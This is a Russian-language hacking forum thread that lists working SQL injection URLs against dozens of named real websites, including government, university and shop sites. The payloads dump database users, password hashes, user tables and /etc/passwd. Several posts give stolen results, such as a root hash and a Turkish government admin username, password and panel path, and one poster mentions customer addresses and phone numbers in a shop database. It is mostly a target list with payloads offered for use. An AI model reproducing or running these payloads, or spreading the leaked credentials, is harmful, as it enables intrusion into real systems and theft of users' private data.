SQL Инъекции

Code:

http://it.byuh.edu/P%20&%20S/p.php?id=-21+union+select+1,2,password+from+mysql.user/*

 

www.lenpravda.ru

Code:

http://www.lenpravda.ru/gate.phtml?id=-1921+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

Code:

http://www.lenpravda.ru/gate.phtml?id=-1921+union+select+1,2,3,convert(user_pass,char),5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*

 

Code:

http://www.atalaia.org/encontro.php?id=-149+union+select+1,2,3,version(),5/*

Code:

http://www.ibict.br/noticia.php?id=-176+union+select+user,convert(password+using+latin1)+from+mysql.user/*

Code:

http://www.brasil.agenciapulsar.org/nota.php?id=-1511+union+select+1,2,3,4,5,6,7,8,9,10,user(),12/*

 

Code:

http://www.cooleysanemia.org/sections.php?sec=1+union+select+1,concat(username,0x3a,user_password),3,4+from+users/*

 

Code:

http://www.vendeta.ru/comm.php?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6+from+users/*

Code:

http://www.allvideo.ru/detail.php3?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*

 

sana.gov.kz

Code:

http://sana.gov.kz/index.php?lang=rus&id_open_rubric=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50...

 

Code:

http://www.kadis.ru/daily/index.html?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

 

2 Grey

Code:

http://www.kadis.ru/daily/index.html?id=-1+union+select+1,2,3,convert(concat(user,0x3a,password),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+mysql.user/*

root:7312874647bb7446

И мое:

Code:

http://mobilefood.ru/show_cat.php?catid=-1+union+select+concat(username,0x3a,passwd)+from+user+limit+0,1/*

пассы немного странные, аналогичны ФИО-полю.. но как ни странно, подходят..
в базе адрес, телефон, заказы.. в общем, обычный интернет-шоп)

Code:

http://www.domsigar.ru/item.php?entry=1579+and+5=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

тут не подбирал )

 

Code:

http://www.legion-club.ru/news.php?id=-6+union+select+version(),2/*

 

Code:

http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,version(),3,4,5/*

 

Code:

http://www.keckobservatory.org/article.php?id=-103+union+select+1,convert(concat_ws(char(58),user(),version(),database())+using+latin1),3,4,5,6,7,8+from+mysql.user/*

Code:

http://director-online.com/buildArticle.php?id=-1154+union+select+1,2,3,4,5,convert(concat(user_password,char(58),user_name)+using+latin1),7,8+from+user/*

Чтобы убедиться в работоспособности этой скули вам придеться дожаться пока страница загрузиться, потом прокрутить всю страничку доконца,
и только после этого увидеть информацию, короче изврат. минус подставить даже не пытайтесь))

Code:

http://sistem.gemtech.fr/cours.php?Id=2+union+select+1,2,convert(concat_ws(char(58),version(),user(),database())+using+latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

Code:

http://www.terrabike.com/shop/shop_faqs.php?id=-1+union+select+table_name,2+from+INFORMATION_SCHEMA.TABLES+limit+37,1/*

 

Code:

http://www.bullchart.de/beitrag.php?id=-1+union+select+1,2,3,4,5,concat(username,char(58),password),7,8,9+from+vb_user/*

Зарегано 24757 пользователей на форуме)))

________

Code:

http://www.marotori.com/bestwebdevelopmentanddesign.php?id=-1+union+select+1,2+from+mysql.user/*

 

http://www.activeserverpages.ru/faq/default.asp?mode=view&id=1+or+1=@@version--
перебираем через not in

 

Code:

http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-30%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

 

ты не заметил что форум хостится в другом месте, и эта таблицу к форуму отношения не имеет.

 

Code:

http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x00),0x00),4+from+mysql.user/*

Code:

http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4/*

 

gov.tr

Code:

http://afyonozelidare.gov.tr/karar.asp?id=-1%20union%20select%200,sifre,kulladi,3%20from%20admin

User:afyonozelidare
Pass:afyon03

Panel:/admin

 

VamShop.ru

Code:

http://vamshop.ru/support/modules/wflinks/viewcat.php?cid=5+union+select+1,2,concat(convert(membername+using+cp1251),0x3a,convert(passwd+using+cp1251),0x3a,convert(passwordsalt+using+cp1251)),4,5,6,7,8,9,10,11,12,13,14+from+smf_members/*

логин:хеш:соль

Code:

http://www.voex.com/news/newsandarticles_article.php?DID=-1+union+select+1,version(),3,user(),5,6,7,database(),9,10,11,12,13,14,15/*